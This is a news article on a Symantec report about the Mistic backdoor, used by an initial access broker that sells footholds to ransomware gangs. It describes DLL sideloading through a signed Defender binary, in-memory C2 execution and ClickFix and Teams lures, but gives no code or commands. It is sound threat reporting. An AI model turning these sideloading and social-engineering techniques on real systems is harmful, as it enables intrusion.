Researchers have identified a new backdoor program that has been used in enterprise intrusions since April and appears to be linked to an initial access broker that sells network footholds to ransomware gangs.
Dubbed Mistic by researchers from Symantec, the malware program has been deployed on networks belonging to organizations from multiple sectors, including insurance, education, IT, and professional services. In some cases it has been used alongside ModeloRAT, a piece of malware written in Python that’s associated with threat actor Woodgnat, also known as KongTuke.
“Woodgnat reportedly functions primarily as an IAB [initial access broker],” the Symantec researchers said in their report. “Its goal is not to deliver the final payload, but to establish highly durable remote access within an enterprise and sell this high-level access to ransomware affiliates and other attackers for a fee. The Symantec Threat Hunter Team has observed ModeloRAT being used in attacks delivering the Qilin ransomware.”
Woodgnat has been operating since at least May 2024 and has served multiple ransomware gangs over the past two years, including Interlock, Rhysida, Akira, 8Base, and Black Basta. Its attacks are largely opportunistic by routing web visitors through a variety of ClickFix social engineering campaigns.
A backdoor with credential stealing capabilities
The Mistic backdoor is launched through a technique called DLL sideloading, where a legitimate executable belonging to another program is executed first and searches for a DLL of a particular name to load into memory. This is a very popular technique for avoiding detection, as many legitimate programs perform dynamic DLL searches across multiple folders and are vulnerable to DLL poisoning.
Ironically in this case the attackers deliver and execute a file called MpExtMs.exe, which is digitally signed and belongs to Microsoft Defender. This file searches for a DLL called version.dll, which in turn searchers for and loads another one called EndpointDlp.dll. The attackers have named their backdoor EndpointDlp.dll so it gets loaded directly in memory.
The backdoor itself reaches out to a command-and-control (C2) server and can execute code delivered from it directly in memory, without saving any file on disk. Other features include the ability to write, delete, and move files on the victim machine and to download and upload files to the C2 server.
The researchers have also observed a credential-stealing .NET DLL being downloaded and executed on victims’ networks, in addition to ModeloRAT. Common system tools used by the attackers include curl, reg.exe, net.exe, PowerShell, certutil.exe, and the Windows Management Instrumentation (WMIC).
“The fact that Mistic executes in memory and also has a kill switch built in means that it is very stealthy, potentially allowing for long-term, stealthy access for attackers,” the researchers said.
ClickFix infection chains
The Woodgnat group’s attack campaigns often involved tricking users into executing malicious PowerShell commands on their computers using a variety of social engineering tricks that include displaying fake CAPTCHA tests on websites and crashing the user’s browser and asking them to paste commands to fix the crash.
Since April the attackers have also started messaging victims on Microsoft Teams impersonating IT support staff and guiding them through a series of malicious paste-and-run steps.
“While the initial compromise may be opportunistic, the attackers profile the machines for potential interest to determine their value and if they can sell access to them,” the researchers said.
The Mistic backdoor is the latest example of initial access brokers and ransomware gangs returning to the use of custom malware tools they developed in-house instead of solely relying on living-off-the-land and dual-use system administration tools.
The Symantec report includes a list of indicators of compromise for this new backdoor and other malicious files and IP addresses used in the recent Woodgnat attacks.
No Responses